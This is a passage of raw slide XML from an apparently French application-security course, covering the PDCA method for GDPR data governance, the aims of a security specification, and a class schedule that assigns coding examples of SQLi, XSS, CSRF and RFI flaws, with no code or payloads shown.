                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2560497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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548641" y="960594"/>
            <a:ext cx="6079575" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0" err="1"/>
              <a:t>Méthode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t> PDCA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360835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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Méthode PDCA – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plan Do Check Act </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Roue de Deming</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1938528"/>
            <a:ext cx="10691265" cy="4289642"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Plan</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Désigner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> un pilote pour la gouvernance des données ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Cartographier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> vos traitements de données personnelles ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Prioriser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> les actions à mener.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Application du plan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Contrôle et identification des traitements susceptibles d’engendrer des risques pour les droits et libertés.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une analyse d'impact relative à la protection des données (AIPD) : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnil.fr/fr/gerer-les-risques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>Act</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Appliquer des corrections et revenir au point 1 après des corrections puis documenter la conformité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421722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092F8F-6144-C0C9-955E-E50758BF432D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA387758-8F8E-3E12-B304-09FAA6204D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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB157D3-D040-01F0-FD50-D1461FF6E8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9" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69357E6F-CE75-7280-4D66-33CE8CB4E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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA89CE1-CD1F-1A98-23E1-CBD6DBCA8CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868741" y="2662430"/>
            <a:ext cx="5928358" cy="1031491"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0" err="1"/>
              <a:t>Méthode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>PDCA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA3E5EA-52A8-CF64-008E-75D78221D2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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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BEC16FEB-6A3B-D704-8ADF-94A6CBEF0AF8}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2" descr="Une image contenant texte, disque compact, cercle, Appareil de stockage de données&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF51C734-F4F7-87A8-79A2-6AF20DCF7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 y="17201"/>
            <a:ext cx="6858000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152820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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le cahier des charges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462AB5B3-6E3D-4837-936D-030D40E80169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Protéger le patrimoine opérationnel de l’entreprise (les bases de données, les documents, les accès divers),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Répondre aux obligations et responsabilités légales des dirigeants dans l’exploitation et la maîtrise de leur système d’information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’élaboration de règles et de procédures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La définition des actions à entreprendre et des personnes responsables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La détermination du périmètre concerné</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349235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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1016432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sécurité des applications – jour 2 &amp; 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>communication du planning</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2299062"/>
            <a:ext cx="10691265" cy="3929107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Correction de l’exercice 1, commentaires et exemple (Plan de sensibilisation EPSI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rendu de l’exercice 2 (Étude de cas RGPD) attendu pour vendredi soir 20h, non noté.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>QCM vendredi 10h, sur ce qui a été vu lundi et aujourd'hui (jeudi).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Coding d’exemples de failles SQLI, XSS, CSRF et RFI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>à déposer sur votre repo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>gitlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bitbucket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>M’envoyer le lien du repo par mail, exemple : https://github.com/tvinchent-epsi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321414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6B3CA38D-7BB0-4D35-BE00-0F48766027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08256156-821A-42B6-BF32-8C7CEB5C56AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1371030"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Organisation du module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4514FD1B-A0BF-4C73-A68E-4B1F7299F6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Espace réservé du contenu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2097E4E2-B316-4DC7-B173-CEB911B6D27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1645997"/>
            <a:ext cx="10691265" cy="4283217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jour 1 (lundi)</a:t>
